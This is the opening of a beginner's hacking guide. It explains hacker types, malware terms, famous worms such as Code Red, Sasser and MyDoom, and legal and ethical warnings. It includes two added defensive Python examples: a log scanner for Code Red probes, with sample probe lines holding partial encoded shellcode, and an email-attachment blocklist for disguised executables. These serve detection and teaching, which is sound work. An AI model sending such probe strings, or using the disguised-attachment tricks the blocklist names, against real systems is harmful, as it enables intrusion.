Chapter 1 — Introduction 


The general public usually has two competing viewpoints of hackers. 
Some people revere them as brilliantly minded individuals while 
others look down on them as petty criminals. While both perceptions 
could be true for many expert hackers, the public’s perception has 
been twisted and contorted by what they see on television dramas and 
in the movies. Because your average user doesn’t understand how a 
computer or the Internet works from a technical perspective, they 
can’t hope to begin to understand what hackers actually do. 


In fact, the term ‘hacker’ usually carries a negative connotation. Ask 
any non-technical person what a hacker is, and they’ll give you a 
response such as, “They’re the bad guys that steal people’s credit 
cards, listen to my phone calls, and work with terrorist organizations.” 
For some reason, probably attributable to entertainment media, hackers 
get a bad rap and most people would instantly assume that their 
behavior is illegal. This stigma couldn’t be further from the truth, 
because the reality is that there are many types of hackers. Some of 
them are good, some of them are bad, and some lie somewhere in 
between. There is no single motivation that drives every hacker and 
no blanket statement that accurately describes every hacker in the 
world. Also consider that hacking isn’t an inherently evil practice and 
you can do it legally. Some people do it as a hobby. More practically, 
some people get paid well as consultants to try to hack into a 
corporate network, with the company's permission, in order to find 
security holes before a criminal does. Be forewarned, though: if you 
start abusing your knowledge it is a slippery slope to the dark side, 
and nothing good happens once you're there. 




If your curiosity has gotten the better of you, if you just want to be 
able to understand what’s going on in the movies and the news, or if 
you have a goal of becoming a competent hacker, I want to personally 
introduce you to hacking and guide you toward those goals. The 
problem most people have when they want to start hacking is that 
they find material that isn’t written for novices. Once you get the 
basics under your belt and can actually apply the knowledge in this 
book, you’ll find that you are much better informed than your peers 
and that technology is actually pretty exciting. As the tools hackers 
use have changed over the last couple of decades, the people who take 
an interest in hacking have changed as well. Technology gets more 
complex with each passing year, but the tools hackers use have also 
become more sophisticated and more automated, which makes the 
learning curve much less steep for newcomers. 


In this guide, I am going to teach you a lot of valuable information 
about hacking such as: 


-What hacking is and what hacking isn’t. 

-Hacking terminology and hacker culture. 

-Types of attacks and the most famous hacks of all time. 

-Ethical considerations and fair warnings about becoming a hacker. 


-Fundamental concepts that will serve as a foundation to build 
hacking skills. 


-How to install Linux operating systems under VMware to set up 
hacking tools. 


-Step-by-step guides for ping sweeps and port scanning. 


-How to map network topologies and perform reconnaissance 
techniques. 


-How to use advanced software to find security holes. 


This is designed to be an all-inclusive guide that will not only give you 
an understanding of the basic technical concepts you will need to 
become a hacker, but also introduce you to some fascinating software 
and show you step-by-step how to use it. I’m sure most of you want to 
get started hacking right away, but I urge you to spend time learning 
the basics before moving on to some of the more challenging attacks 
discussed in this book. 


What it Takes to Become a Good Hacker 


One of the reasons some hackers become so successful is that they 
have a passion for what they are doing. Their personality drives them 
to tackle extremely difficult challenges, which is why some hackers 
break systems just to see if they can. If you want to become a 
proficient hacker, it takes the same two things as any other skill you 
want to build: time and practice. If you can’t figure something out in 
the first two minutes, don’t give up. Some of the pros will spend weeks 
or even months planning and executing their attacks. Once you get the 
basics under your belt, you’re going to be able to apply these 
techniques in a matter of minutes. I would argue that the hardest part 
for a newcomer is getting their environment set up. Past that, things 
start to get easier and you can really sink your teeth into how the 
technology works. Before we get to the juicy details, we should begin 
with an overview of hacking so you understand some rudimentary 
concepts and perceptions about hacking. 


Chapter 2 - An Overview of Hacking 


To your average computer user who doesn’t understand much about 
Internet and network security, hackers are shrouded in a cloud of 
mystery. Most people don’t understand what they do or how they do 
it. And the movies don’t help to demystify them, either. Countless 
action movies portray a character who takes the role of a hacker and 
can break into top secret computer systems to save the world. When 
the camera pans over their computer screens, you see them typing 
strange letters and numbers into a command prompt that, for all you 
know, is a foreign language. Humorously enough, the hackers in the 
movies frequently use a real tool called Nmap, which I will show you 
how to use later in this book. If you’ve seen The Matrix Reloaded, 
Dredd, Fantastic Four, The Bourne Ultimatum, Die Hard 4, or The Girl 
With The Dragon Tattoo (among many others), you have already seen 
actors using Nmap in their on-screen hacking. 


But what exactly is hacking? Hacking means a lot of different things to 
a lot of different people. It is an umbrella term used to describe 
hundreds, if not thousands, of techniques for making computers and 
information systems do things they were not intended to do. At its 
core, and in the most conventional meaning of the word, hacking 
means using a computer to gain unauthorized access to another 
computer system or to data that is protected or restricted. Once a 
hacker has gained unauthorized access to a system, he or she has the 
ability to steal information, change configurations, alter or delete 
data, and install further malicious code to gain even greater control 
over the target. The list goes on, and the sky is the limit regarding 
what an experienced hacker can do once they find a way into a 
computer system. 


However, there is a lot more to hacking than clicking a button to 
attack a computer. You will need to use tools and scanners to map the 
local network topology and use reconnaissance techniques to gather 
information and look for vulnerabilities. The good news for newcomers 
is that these tools are highly automated today. In the past, there was 
no software that aggregated vast amounts of code and tools into 
simple, easy-to-use commands. As such, hackers in the past needed an 
intimate understanding of the technologies they were trying to break, 
and it was difficult to do so. Having a deep understanding of 
technology today will certainly help you become a better hacker, but 
my point is that these tools are becoming increasingly easy to use. In 
fact, there are kids and teenagers who are too curious for their own 
good and take advantage of highly sophisticated tools to break into 
systems they have no business accessing. Understand that these tools 
simplify the hacking process considerably. If a teenager can break into 
a system using simple tools, guess what? You can too. 


But what does it take to excel as a hacker? Well, most hackers have 
several things in common. First of all, the most capable are 
experienced software developers who can write their own tools and 
exploits. Furthermore, most hackers are competent Linux users. Linux 
gives you fine-grained control over the operating system and provides 
virtually limitless access to the latest penetration-testing and 
security tools, for free. In addition, some Linux distributions such as 
Kali Linux were designed specifically for penetration testing and 
security auditing. Linux can be scary for newcomers, but I will show 
you how to run Linux and use some special tools later in this book in a 
simplified and easy to understand manner. Lastly, hackers almost 
always have a working knowledge of networking topics such as IP 
addresses, ports, and the dirty details of how different networking 
protocols operate. Some tools even exploit vulnerabilities in these 
network protocols, and knowledge of these weaknesses combined with 
the ability to write programs is what makes some hackers truly 
formidable. 


Some of these techniques are outside the scope of this book since this 
guide was created for beginners, but if you really want to excel as a 
hacker you would do well to study and practice these concepts. 
Though we won’t touch on software development in this guide, I will 
certainly show you step-by-step how to install and use some various 
hacking tools that the pros take advantage of and teach you the basics 
of networking addresses and protocols. 


Chapter 3 — Attack Types and Famous Viruses 


Most of you have probably heard of viruses, worms, malware, key 
loggers, rootkits, and Trojans before, but what the heck are these 
things and how do hackers use them to steal people’s data and 
disrupt their computer systems? Each of these tools is a little bit 
different from the others, but they all share one goal: to get into a 
target’s system and give the attacker access or information he or she 
isn’t supposed to have. No, I’m not going to show you how to craft 
nefarious software, but you should have a well-rounded understanding 
of these topics if you have any hope of calling yourself a hacker. 


First and foremost, you need to understand the concept of computer 
viruses, because they are one of the most popular terms thrown around 
in discussions about cyber security and hacking. A computer virus is a 
piece of malicious code that attaches itself to a legitimate program or 
document and, when that host is run or opened, copies itself into other 
programs or files on the system. It spreads to other computers when an 
infected file is shared, emailed, or copied over. Viruses are aptly named 
because they reproduce much like a virus in real life, and they cannot 
run on their own without a host program. Their payloads range from 
harmless messages to rendering a system unusable or destroying data. 
Again, you'll hear about computer viruses in the movies a lot, so we’ll 
take a look at some of the most famous computer viruses of all time 
after defining the other terminology. 


A worm is very similar to a virus, and it’s true that the line between a 
virus and a worm gets blurred. The largest difference is that a worm is 
not attached to a host program. It exists as an independent program on 
the infected system, and it spreads on its own across the network, 
either by exploiting a vulnerability in a service on other hosts (with 
no user action required) or by mailing itself to every address it can 
find. Colloquially, people call both of these "viruses," but the 
distinction matters in practice: a worm that exploits a network 
service can infect every vulnerable machine it can reach in minutes, 
which is why many of the famous outbreaks described below were worms. 


Perhaps you have already experienced the negative consequences of 
malware. Malware gets its name by combining two other words: 
MALicious softWARE. It is the umbrella term for any software an 
attacker uses to gain access to a target’s data, block them from their 
data, or change information on their computer, so viruses, worms, 
Trojans, key loggers, and rootkits are all malware. One of the most 
common ways malware is distributed is through online downloads, 
whereby a downloadable file has been bundled with malware that the 
user then downloads and installs. You'll see this frequently with files 
shared through P2P (peer-to-peer) programs such as BitTorrent. 


Furthermore, a key logger is yet another type of malicious program, 
and as you might have guessed its sole purpose is to record the 
keystrokes of the user whose machine has been infected. This is 
absolutely disastrous for the target, because the attacker will be able 
to record and view every single key that the target types. This includes 
usernames and passwords, Google searches, private instant messaging 
conversations, and even payment card data. If an attacker has 
successfully installed a key logger, the target is at the mercy of the 
attacker. There’s no telling what the attacker could do next: they 
could log into the target's accounts using the captured usernames and 
passwords, steal money using the payment card data, or use the 
infected machine to carry out attacks on other hosts on the same 
network. 


Next, you should also be familiar with the idea of a rootkit. Rootkits 
are extremely dangerous because they modify the operating system 
itself, for example by altering system libraries or kernel data 
structures, so that the attacker's processes, files, and network 
connections are hidden from the user and from administrative tools. 
This helps viruses, key loggers, and other malicious code persist for 
extended periods of time without detection on the target system. They 
can even hide software that would otherwise have been detected and 
quarantined by security software, because that software sees only what 
the rootkit lets it see. 


Last but not least is the infamous Trojan horse, often loosely called a 
Trojan virus or a backdoor. Strictly speaking a Trojan is not a virus, 
because it does not replicate on its own; it is malware disguised as, or 
hidden inside, an innocent-looking application that the user installs 
willingly. Trojans are extremely problematic because they are very 
hard to detect without the right security software. There could even be 
a Trojan horse lurking in the depths of your personal computer right 
now, and they are frequently used to open a backdoor that gives the 
attacker complete control of the target system. 


Now that you have a basic understanding of the different types of 
malicious code hackers employ to do their bidding, you should know 
about some of the largest and most famous computer viruses of all 
time. Some of them are actually other types of malicious code such as 
Trojan horses, but people still refer to them as viruses. Any expert 
hacker will have heard of these famous attacks before, so you should 
know them as well. 


Also, if you get the inkling to try your hand at using one of these 
methods on your own by hunting around on the Internet for freely 
distributable code that will allow you to attack a target system, just 
know that you’re setting yourself up for a disaster. Humorously 
enough, some hacking newbies try to find rootkits and key loggers to 
attack hosts. But here’s the catch — some hackers actually facilitate 
their attack by taking advantage of people who want access to these 
types of programs. 


And the end result isn’t pretty. In the end, the newbie hacker might 
actually install an expert hacker’s malware and unknowingly infect 
their own machine! And don’t forget that there are ethical and legal 
implications as well. Several of the people responsible for the famous 
attacks below were identified, arrested, and prosecuted. So don’t try to 
research and deploy these types of malware at home! 


1. Code Red 


I know what you may be thinking, and no, this has nothing to do with 
the movies. When people think of hacking in the movies, they think of 
top secret military bases getting hacked by a teenager and raising 
their alert level to ‘code red.’ Believe it or not, it is rumored that the 
two researchers who discovered and named this attack were merely 
drinking the cherry-flavored Code Red soda when they first identified 
the worm back in July 2001. This worm was pretty darn nasty, and its 
targets were servers running Microsoft's IIS web server software. 


The attack relied on a buffer overflow in the Indexing Service 
extension (idq.dll) that shipped with IIS; Microsoft had published a 
patch for it about a month before the worm appeared, but many 
servers had not applied it. The worm was difficult to detect because it 
ran solely in memory (RAM, or short term storage, as opposed to long 
term storage such as a hard disk drive) and never wrote a file to disk, 
so a reboot removed it but an unpatched server was promptly 
reinfected. Things got out of hand pretty quickly, too. After it had 
compromised a system, it would start roughly a hundred threads that 
scanned random Internet addresses for other vulnerable web servers. 
Not only that, but it gobbled up a ton of local server resources that 
all but crippled some of the target systems. 
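The request a Code Red probe sends is well documented and easy to spot in web-server logs, which is the check a server administrator would have wanted in 2001. The following is an added example of mine, not code from this book: it scans constructed, simplified W3C-style IIS log lines for the worm's signature, a GET for /default.ida whose query string is a long run of N (Code Red) or X (Code Red II) followed by %u-encoded shellcode such as %u9090. The log layout, the 64-character threshold, and the log lines themselves are assumptions made for the demonstration.

```python
"""Spot Code Red probes in web-server logs.

Added example, not code from the book.  The signature is the one
documented in public analyses of the worm: a GET for /default.ida
whose query string is a long run of 'N' (Code Red) or 'X' (Code Red II)
followed by %u-encoded shellcode such as %u9090.  The simplified
W3C-style log format and the log lines are constructed for the demo.
"""
import re
from collections import Counter
from typing import Dict, List, Optional

# Simplified W3C extended log line (assumed layout for this example):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
LOG_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})$"
)

# The real worm sent a few hundred pad characters; 64 is a heuristic
# threshold chosen here so that truncated log entries still match.
PAD_RE = re.compile(r"^(?P<pad>N{64,}|X{64,})")
SHELLCODE_MARKER = "%u9090"  # %u-encoded NOP sled present in both variants

# Constructed sample log: one normal hit, a Code Red scanner hitting twice,
# a Code Red II probe, and a benign request to the same .ida handler.
SAMPLE_LOG = "\n".join([
    "2001-07-19 10:02:11 198.51.100.7 GET /index.htm - 200",
    "2001-07-19 10:02:15 203.0.113.42 GET /default.ida "
    + "N" * 224 + "%u9090%u6858%ucbd3%u7801%u9090%u6858=a 200",
    "2001-07-19 10:02:16 203.0.113.42 GET /default.ida "
    + "N" * 224 + "%u9090%u6858%ucbd3%u7801=a 200",
    "2001-08-04 22:14:03 192.0.2.9 GET /default.ida "
    + "X" * 224 + "%u9090%u6858%ucbd3%u7801=a 200",
    "2001-08-04 22:15:30 198.51.100.7 GET /default.ida q=hello 404",
    "2001-08-04 22:16:00 198.51.100.7 GET /scripts/ - 404",
])


def classify_request(stem: str, query: str) -> Optional[str]:
    """Return 'CodeRed', 'CodeRedII' or None for a single request."""
    if stem.lower() != "/default.ida":
        return None
    m = PAD_RE.match(query)
    if m is None or SHELLCODE_MARKER not in query.lower():
        return None
    return "CodeRedII" if m.group("pad")[0] == "X" else "CodeRed"


def scan_log(text: str) -> List[Dict[str, object]]:
    """Parse each line and collect the requests that match the worm."""
    hits: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m is None:
            continue  # unparseable line; a real tool would count these
        variant = classify_request(m["stem"], m["query"])
        if variant is not None:
            hits.append({
                "when": f"{m['date']} {m['time']}",
                "ip": m["ip"],
                "variant": variant,
                "status": int(m["status"]),
            })
    return hits


def sources(hits: List[Dict[str, object]]) -> Counter:
    """Count probes per source address; repeat senders are infected scanners."""
    return Counter(str(h["ip"]) for h in hits)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f"{h['when']} {h['ip']:>15} {h['variant']:<9} HTTP {h['status']}")
    print("probes per source:", dict(sources(found)))
```

The status code is worth keeping in the output: a server that was never mapped to the .ida handler answered these probes with an error, whereas an unpatched IIS server that logged a 200 for them should be treated as compromised until proven otherwise, and every source address that sent one was itself an infected machine worth reporting to its network owner.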


2. Sasser 


Sasser is another worm designed to target Windows (noticing a 
pattern here?). It first found its way into the spotlight in April 2004 
and was created by a German teenager named Sven Jaschan, who was 
also responsible for another famous worm named Netsky. One reason 
this worm made Internet security headlines was that it affected more 
than a million targets! Yet again, this worm took advantage of a 
buffer overflow vulnerability, this time in the Windows LSASS service 
(Local Security Authority Subsystem Service), and Microsoft had 
released a patch for it a couple of weeks before the worm appeared. 


Because the exploit crashed LSASS, Windows would start a forced 
shutdown countdown, so infected machines rebooted themselves over 
and over and were very hard to clean. To be fair, most people saw this 
worm as a nuisance as opposed to a serious threat. But it cannot be 
denied that it caused massive and widespread disruption. It even 
reached systems in critical infrastructure, and its scanning traffic 
made many networks perform very poorly. Like other network worms, it 
used each infected computer to scan for and infect further computers, 
with no user interaction required. 


But one of the biggest problems with this worm is that users hadn't 
applied the patch even though it was available before the outbreak. 
Both public and private sector organizations were affected, including 
news stations, transportation systems, healthcare organizations, and 
even some airline companies. But what was the end result? The damages 
were collectively chalked up to be approximately $18 billion! What 
happened to the infamous Jaschan, you ask? Fortunately for him, he 
had written the worm while still a minor and was tried under juvenile 
law, so he received a slap on the wrist considering how much damage 
he did: a suspended sentence of 21 months. 


3. Zeus 


The Zeus virus was really a Trojan horse that infected (can you guess 
which operating system?) Windows machines and made them part of a 
criminal botnet. Most typically, it was used for key logging and for 
man-in-the-browser attacks: it hooked the web browser so that it could 
read and modify the contents of web forms before they were encrypted 
and sent to the intended web server, and it could inject extra fields 
into banking pages to ask the victim for additional details. It most 
frequently infected hosts through drive-by downloads and innocent- 
looking applications, but the attack also relied heavily on phishing 
emails. 


Zeus was first identified in 2007, and by 2009 researchers had found 
that infected machines had leaked credentials for tens of thousands of 
FTP accounts belonging to major companies, including Amazon, Bank 
of America, Oracle, and even Cisco. The Trojan also allowed the 
criminals to steal usernames and passwords for social media sites, 
email accounts, and online banking. 


4. The I Love You Attack 


The ‘I Love You’ attack of May 2000 is so notorious in hacker 
communities because it created a whopping $10 billion in estimated 
damages. It arrived as an email with the subject "ILOVEYOU" and an 
attachment named LOVE-LETTER-FOR-YOU.TXT.vbs; because Windows 
hid the final extension by default, the file looked like a harmless text 
file, but opening it ran a Visual Basic script that overwrote files on 
the machine and mailed itself to everyone in the victim's address 
book. What’s more impressive is that researchers believe that 10% of 
all computers connected to the Internet at the time were infected with 
this virus. Infecting 10% of the Internet with a computer virus is 
staggering to say the least. Things became so terrible that some of the 
larger organizations as well as governmental agencies around the 
world shut down their mail systems in an effort to avoid becoming 
infected. 


5. Melissa 


This naughty virus, which appeared in March 1999, was supposedly 
named after an exotic dancer the creator, David L. Smith, had once 
known. Supposedly, the very root of the virus was an infected Word 
document that was uploaded to the alt.sex Usenet group with the 
appearance of being a collection of usernames and passwords for 
subscription and membership-only pornographic websites. But once a 
user downloaded and opened this Word document, all hell would break 
loose: the macro inside it would run and the virus would activate. 


To start, the virus would look at the first 50 addresses in the infected 
host’s email address book and mail itself to them as an attachment. In 
turn, this flood of messages severely disrupted the email services of 
large enterprises and governmental bodies. Furthermore, the virus 
would even corrupt documents by inserting quotes from the television 
show The Simpsons. However, the original Word document was 
eventually traced back to Smith and he was arrested within a week of 
the virus’s release. Smith only ended up serving 20 months in prison 
and paying a $5,000 fine (he had faced up to 10 years) because he 
turned informant on other virus writers and helped the FBI make more 
arrests. To top it all off, it was estimated that the damages from his 
virus totaled approximately $80 million. 


6. The Conficker Worm 


The Conficker worm first appeared in late 2008 and its origin is still 
unknown. This worm was especially troublesome because it created a 
botnet (a group of infected computers controlled together by an 
attacker) of more than 9 million hosts that included governmental 
agencies, large enterprises, and individual users alike. This worm 
makes the top 10 list because it caused damages estimated at a 
staggering $9 billion. It was able to infect Windows machines through 
an unpatched vulnerability in the Windows Server service, the 
background service that handles file and printer sharing over the 
network, for which Microsoft had issued an emergency patch in 
October 2008. Later variants also spread through USB drives and by 
guessing weak passwords on network shares. 


After a host had been infected with the worm, the worm would wreak 
havoc by blocking access to Windows Update and antivirus vendors' 
websites, and its password-guessing attempts could even lock out user 
accounts, preventing people from logging in to clean up the worm. If 
that weren’t bad enough, a later version installed additional malicious 
code that made the target computer part of the botnet and pushed fake 
antivirus software that scared users into paying the attackers to 
"remove" infections that didn't exist. Microsoft and third party 
antivirus software providers eventually released updates and removal 
tools to combat this worm, but it did massive amounts of damage 
before a solution could be reached. 


7. MyDoom 


MyDoom was first seen in January 2004, and it was the fastest 
spreading email worm since the I Love You attack. The creator of this 
attack is still unknown, but it is rumored that the creator was paid to 
carry out this attack, due to the message included in the worm that 
read, “Andy, I’m just doing my job. Nothing personal, sorry.” 


This worm was incredibly sly because it took on the appearance of an 
email delivery error, with the worm itself as the attachment. After a 
user had opened the "error" to view the problem, the worm would 
send copies of itself to addresses harvested from the infected system. 
Furthermore, it would copy itself into the shared folder of the KaZaA 
peer-to-peer program on the infected host so that other users would 
download it. It is also believed that the worm is still circulating on 
the Internet to this day, and it caused approximately $38 billion 
worth of damages. 
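Both the I Love You and MyDoom attacks above got their foothold through an email attachment that did not look like a program: a .vbs script hiding behind a .TXT name in one case, bare .pif, .scr, .exe and .zip attachments in the other. The check a mail-gateway operator wanted then, and still wants, is a rule on attachment names. The following is an added example of mine, not code from this book; the ILOVEYOU attachment name is the documented one, the other filenames are constructed, and the two extension lists are my assumptions rather than any official blocklist.

```python
"""Flag attachment names that disguise an executable as a document.

Added example, not code from the book.  ILOVEYOU's attachment was
LOVE-LETTER-FOR-YOU.TXT.vbs (the .vbs hidden by Windows' "hide known
extensions" default); MyDoom used .pif, .scr, .exe, .cmd, .bat and .zip
attachments.  The other sample names are constructed for the demo and
the extension lists are an assumption, not an official blocklist.
"""
from typing import Dict, List

# Extensions Windows runs directly or through the script host (assumed list).
EXECUTABLE_EXTS = {
    ".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".vbe",
    ".js", ".jse", ".wsf", ".wsh", ".hta", ".lnk",
}
# Extensions a user would read as a harmless document or media file (assumed).
DOCUMENT_EXTS = {
    ".txt", ".doc", ".pdf", ".jpg", ".jpeg", ".gif", ".htm", ".html",
    ".mp3", ".zip",
}

SAMPLE_ATTACHMENTS = [
    "LOVE-LETTER-FOR-YOU.TXT.vbs",    # the real ILOVEYOU attachment name
    "quarterly_report.pdf",           # constructed, benign
    "message.zip",                    # constructed; archives need a look inside
    "photo.jpg.scr",                  # constructed double extension
    "readme.txt",                     # constructed, benign
    "body.pif",                       # constructed, MyDoom-style bare executable
    "invoice                  .exe",  # constructed; spaces push .exe out of view
]


def classify_attachment(name: str) -> Dict[str, object]:
    """Decide whether a filename is a disguised executable and say why."""
    parts = name.lower().split(".")
    exts = ["." + p.strip() for p in parts[1:]]
    final = exts[-1] if exts else ""
    reasons: List[str] = []
    if final in EXECUTABLE_EXTS:
        reasons.append(f"executable extension {final}")
        # ILOVEYOU trick: a document extension sits where the eye stops.
        if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTS:
            reasons.append(f"double extension: {exts[-2]} shown, {final} runs")
        # Padding trick: whitespace pushes the real extension out of the
        # visible part of the filename in narrow mail-client columns.
        if any(p != p.strip() for p in parts[:-1]):
            reasons.append("whitespace padding hides the real extension")
    return {"name": name, "block": bool(reasons), "reasons": reasons}


def scan_attachments(names: List[str]) -> List[Dict[str, object]]:
    """Apply the rule to every attachment name in a message."""
    return [classify_attachment(n) for n in names]


if __name__ == "__main__":
    for r in scan_attachments(SAMPLE_ATTACHMENTS):
        verdict = "BLOCK" if r["block"] else "allow"
        print(f"{verdict} {r['name']!r}: {'; '.join(r['reasons'])}")
```

A name check is only the first layer: MyDoom also shipped inside .zip attachments, so a real gateway opens archives and checks the actual file type from its contents rather than trusting the extension at all, and the same double-extension logic applies to anything a desktop would execute, not just the list assumed here.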


8. Stuxnet 


This attack, discovered in 2010, has a political background, as it is 
widely reported to have been created jointly by the United States and 
Israel, though neither government has confirmed this. While some of 
the past viruses were created out of malice, contempt, or the curiosity 
to see just how much damage a prolific hacker could create, this one 
was created for the purpose of cyberwarfare. The goal was to stymie 
Iran's uranium enrichment program, and almost two thirds of the hosts 
infected by this worm were located in Iran. 


In fact, it is estimated that the worm was successful in damaging 
about 20% of the uranium enrichment centrifuges at Iran's Natanz 
facility. More specifically, it targeted PLCs (programmable logic 
controllers), the components that automate large machinery and 
industrial equipment. It looked for Siemens Step 7 control software 
talking to specific Siemens PLC models; if it infected a Windows host 
that wasn't connected to that equipment, it simply lay dormant and 
tried to spread further. When it found its target, it reprogrammed the 
PLCs to repeatedly change the spin speed of the centrifuges, far above 
and below normal, while replaying normal-looking sensor readings to 
the operators so that nothing appeared wrong until the machinery 
physically broke. 


9. Crypto Locker 


This malware, which spread in late 2013, is another example of a 
Trojan horse that infected Windows machines, and the goal was to 
hold the victim's files for ransom. It arrived mostly as an email 
attachment and through an existing botnet, so it had several ways to 
reach new computers. What made it so troublesome was what it did 
after infecting a host: it encrypted the user's documents and other 
files using a scheme in which the key needed to decrypt them (the 
private half of a 2048-bit RSA key pair) was generated on the 
attackers' server and never stored on the victim's computer. If you 
wanted your files back, you had to pay the attackers with prepaid 
payment cards or bitcoins. 


Many people were successful in removing the Trojan from their 
computers, but they still had one gargantuan problem: the files on 
their hard drive were still inaccessible because they could not be 
decrypted without the private key. In 2014 an international law 
enforcement operation took down the Gameover ZeuS botnet that had 
distributed CryptoLocker; its alleged operator, Evgeniy Bogachev, was 
indicted but never arrested, and the private keys recovered from the 
attackers' infrastructure were used by security firms to offer victims 
a free decryption service. Apparently, the attack was successful in 
garnering roughly $3 million in ransoms, and it infected about half a 
million targets. 


10. Flashback 


I always love it when Apple evangelists claim to PC users that their 
computers are superior to Windows machines because their code is 
infallible and there is no way to get a virus on a Mac. While it’s true 
that Windows machines are targeted far more often, Macs aren’t 
immune either. Such was the case with the Flashback Trojan, first 
observed in 2011. It initially posed as a fake Adobe Flash Player 
installer (hence the name), and later versions installed themselves 
silently through an unpatched Java vulnerability when a user simply 
visited a compromised website. Infected Macs became part of a botnet. 
Believe it or not, by 2012 this Trojan had infected over 600,000 Macs, 
and a few of those were even located at Apple's headquarters. Apple 
eventually shipped a Java update and a removal tool, though many 
believe that thousands of Macs are still affected. 


In Summary 


Viruses, malware, and Trojan horses are just one facet of hacking, 
though. The truth is that most of this malware was created by people 
who understood the systems they were attacking at least as well as 
the defenders did, and most of the authors were skilled software 
developers. If you want to become as skilled as these hackers, you’re 
going to need to become an expert software developer. There’s no way 
around it. However, I would hope that this section only opened your 
eyes to the potential some of these attacks have to cause widespread 
devastation and costly damages. 


Again, please understand that the purpose of this guide isn’t to teach 
you how to create a program that will harm other people’s computers, 
rack up massive multimillion dollar damages, and leave you with 
heavy consequences such as prison time and ungodly fines. However, 
as a white hat hacker, you need to be aware that these types of attacks 
exist so you have a basic hacking vocabulary and some foundation 
knowledge. 


I will, however, show you how to crack various passwords, map 
network topologies, exploit vulnerabilities, and scan targets for 
security flaws. In these types of examples, we will be focused on 
hacking into a single target host or network instead of trying to 
release a plague upon the global Internet. All of that in good time, 
however, because first you need to understand the different types of 
hackers that lurk on the Internet, ethical considerations regarding 
your use of the knowledge in this book, and the consequences of your 
actions should you misuse this information and get caught red- 
handed. 


Chapter 4 — Ethical Considerations and Warnings 


A book about hacking would be irresponsibly incomplete without a 
chapter giving you a fair warning on the consequences of misusing 
these techniques as well as the ethical considerations of hacking. To 
begin this discussion, you need to be familiar with two different 
terminologies that describe different types of hackers: black hat and 
white hat. I like the imagery these terms bring to mind because they 
always seem to remind me of Spy vs Spy. 


Black hat hackers are what most people typically think of when they 
hear the word “hacker.” A black hat hacker is the type of nefarious 
Internet user who exploits weaknesses in computing systems for 
personal gain or in order to disrupt an organization’s information 
systems to cause them harm. He’s the guy wearing a high collared 
shirt, sunglasses, and a fedora behind an array of 20 or so computer 
monitors or the nerd in the movies who can break into a top secret 
system illegally. 


There really isn’t any good that can come out of adopting a black hat 
approach to hacking, either. When you hear in the media that a 
financial institution just lost thousands of usernames and passwords or 
that a social media database was compromised and vast numbers of 
people lost sensitive personal information, the attack was carried out 
by a black hat hacker. Recently, there was even a WordPress plugin 
with an XSS (cross-site scripting) vulnerability, a type of website flaw 
that lets an attacker inject script into pages that other visitors' 
browsers then execute, that was being exploited worldwide by ISIS 
sympathizers to deface websites. If you are reading this book because 
you have dreams of causing mass disruption and chaos, I would highly 
advise you to reconsider. However, understand that security and 
penetration tools aren’t inherently good or evil. One could argue that 
they are much like firearms in the sense that the weapon is an 
inanimate object and it is only as good or evil as the person wielding 
it. 


White hat hackers, on the other hand, are the complete opposite. 
They’re the good guys who do everything in their power to find 
potential security flaws and correct the errors so the black hat hackers 
can’t break a system. As you read this book, you need to consider all 
of the tools and techniques I show you from the perspective of a white 
hat hacker and use them responsibly. If you pursue white hat hacking 
professionally, you can add tremendous value to the organization you 
work for and make big money doing so. Some white hat hackers that 
have the CEH (Certified Ethical Hacker) certification make salaries 
well into the six figure range. Internet security is only becoming more 
important with each passing year, and a talented white hat hacker can 
use penetration testing tools and footprinting methods to identify 
disastrous security flaws on the organization’s network and 
information infrastructure and patch them before they become a 
problem that would cost the organization obscene amounts of money. 


Furthermore, you need to be aware of the consequences of misusing 
the knowledge you learn in this book. Though you likely won’t get 
caught snooping around a network attached to an unsecured SOHO 
(Small Office/Home Office) wireless network in your neighborhood or 
at your favorite local coffee shop, you need to respect other people’s 
rights to privacy. Think about it - how would you feel if you were 
sitting down for a cup of coffee while reading a book only to find out 
later that someone had attacked your Kindle over the coffee shop’s 
network and stole your data? You would feel enraged, irritated, and 
violated. So remember the golden rule as you grow into a white hat 
hacker. 


Also consider that using penetration tools on networks where you 
don’t have any authority to do so could lead to some extremely 
negative consequences. Let’s face it, you don’t have the right to steal 
other people’s personal information — it’s illegal. Not only could you 
provoke civil lawsuits, but you could even face jail or prison time 
depending on the nature of your offense. If you choose to do it on 
your employer’s network and you get caught, the best case scenario is 
that you would have some extremely uncomfortable questions to 
answer and the worst case scenario is that you would be fired. 
It’s just not worth it, so keep that in mind moving forward. 


Instead of testing out these techniques on public or corporate 
networks, my advice would be to try these in your very own home. 
Even a small home network will provide a digital playground for you 
to test out your new security skills. All you would need to run through 
some of these demos would be a personal computer, a wireless router, 
and preferably a few other devices that you can attach to your 
network. In the footprinting section I will show you how to run ping 
sweeps and other utilities to perform reconnaissance and information 
gathering methods, so having several other devices will give you more 
“toys” to play with on your local area network (LAN). 


By now I hope you understand that the word “hacker” is rather 
ambiguous. Years ago, it rightfully meant a black hat hacker. Today 
however, it could refer to any number of different types of people who 
are extremely knowledgeable about technology, and the term “hacker” 
doesn’t necessarily mean someone who is trying to steal intellectual 
property or break into a restricted network. Calling someone a hacker 
is the layman’s approach to describing a digital thief, but security 
professionals will often draw the line between the white hats and the 
black hats. 


With all of the dire warnings out of the way, we can now proceed to 
the juicier and more pragmatic sections of the book you have all been 
waiting for and we can begin to learn how you personally can get 
your feet wet with hacking. To begin, understand that this book is 
written with the assumption that you have little to no understanding 
of rudimentary networking and security concepts. Because this book is 
written for beginners as opposed to seasoned Internet security 
professionals and expert hackers, you need to first have a basic 
understanding of network terminology, addressing concepts, and other 
fundamentals that you will be able to use as a foundation to build 
your hacking skills upon. So, let’s get started with networking 
fundamentals! 


Chapter 5 - Networking Fundamentals 


Understanding the OSI Model and Networking Terminology 


The OSI Model (Open Systems Interconnection) is one of the best 
places to begin if you are lacking a working knowledge of networking 
concepts. Just about every one of the demos we will run through 
together is heavily based on the OSI model and network security 
professionals often throw around terminology and jargon related to 
different components of this model. Also, it will benefit you personally 
if you understand what level of the OSI model various attacks target 
and this knowledge is fundamental to understanding IP addresses and 
